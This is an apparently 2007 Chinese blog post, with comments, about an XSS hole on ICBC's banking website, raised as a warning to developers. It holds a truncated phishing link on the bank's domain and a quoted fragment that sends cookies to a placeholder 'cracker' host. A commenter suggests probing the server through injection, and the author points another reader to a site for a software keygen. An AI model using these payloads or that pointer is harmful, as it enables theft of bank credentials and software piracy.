再说工行漏洞
前几天发了一个贴,工行官方网站再次出现非常低级的漏洞,很快就被继续转到CSDN上了.
呵呵,不过还是有人没有意识到这个漏洞的严重性。不要认为XSS比较普遍就忽略它的危害性。属性XSS,并具有基本的安全意识是每个合格程序员必备的一种技能。
上次我提供的简单漏洞,可能很多人不以为然,下面你看看这个链接吧。
感谢Pluto2006_heaven 提供:
看来工行对这个新漏洞还未给予足够重视,其实要利用这个漏洞钓鱼,并不需使用独立的伪装页面,而只需要利用工行的服务器构造一个页面即可----样看起来更真实,下面是采用这种方法实现钓鱼的示例链接代码(该示例只可用于技术讨论与研究,不得用于非法用途,否则后果自负!):
http://www.icbc.com.cn/cli...
Tags: 安全
其他技术 » 我看互联网 | 评论(6) | 引用(0) | 阅读(133)
引用地址: http://www.phpobject.net/blog/tb.php?t=85&extra=dd66a
feifengxlq Email Homepage
2007/01/08 17:49
今天再上去看,工行已经修复这个错误。
banboy
2007/01/04 15:28
呵呵,我的ZEND STUDIO快过期了,有没有什么注册机或注册码什么的,
我感觉ZEND 挺好用的,呵呵
feifengxlq 回复于 2007/01/04 15:47
在喜悦国际村上有,你搜索下就好了
banboy
2007/01/04 15:26
你给的最后一点是非常有价值的,
个人认为钓鱼程序是太被动了,
其实这里既然para没做检测的话,应该随便进网站的内部
看服务器是什么系统,
SQL注入的方式(也不一定是sql代码的注入,也可以是web服务器所使用系统的shell代码的调用)
我想这个黑客水平也不怎么高,
我个人是学习exploit的,但是没学多久,难度太大,如果完全靠自己的话很难,所以现在国内的黑客我不太承认
用外国人的工具黑中国人,太过份了,
feifengxlq 回复于 2007/01/04 15:47
不是黑工行,主要提醒,同时也说明我们程序员本身来注重安全。很多做网站开发业务的公司都不注重安全的,事实上很多客户也更加没有安全意识,对他们来说,只要你完成相应的功能就OK了,性能,安全,他们很少有人考虑过。
很少有客户会把我们完成的项目交给专业的测试团队去测试性能和安全的
feifengxlq Email Homepage
2007/01/04 11:49
我对黑客技术也没多少了解,但我认为:不相信任何外部数据,并对外部数据进行相应的过滤是一个合格程序员的必须。
csdn上有人说
事实上管理员和页面编辑的境地最为危险。可以引诱他们访问问题 URL, 可以导致 Cookie 被发送出去 ("?c=window.location='http://cracker/'+docu... ")。这样可以真正修改页面, 并以此为跳板获取更高权限。
我虽然不知道具体怎么做,但这一定是可行的
banboy
2007/01/04 11:20
刚才我随便查了下关于你说的钓鱼的资料,也大体了解了一下,
一般的钓鱼是发生在非官方网站上点击了比如ICBC的字眼,
然后进到你上面所给的页面是吗,
难道钓鱼就这么简单,不会吧
请高手指点
feifengxlq 回复于 2007/01/04 11:45
自己看看csdn上的评论吧。http://blog.csdn.net/hcat1...
banboy
2007/01/04 11:09
[
2007/01/04 01:11 | by feifengxlq ]
没有评论:
发表评论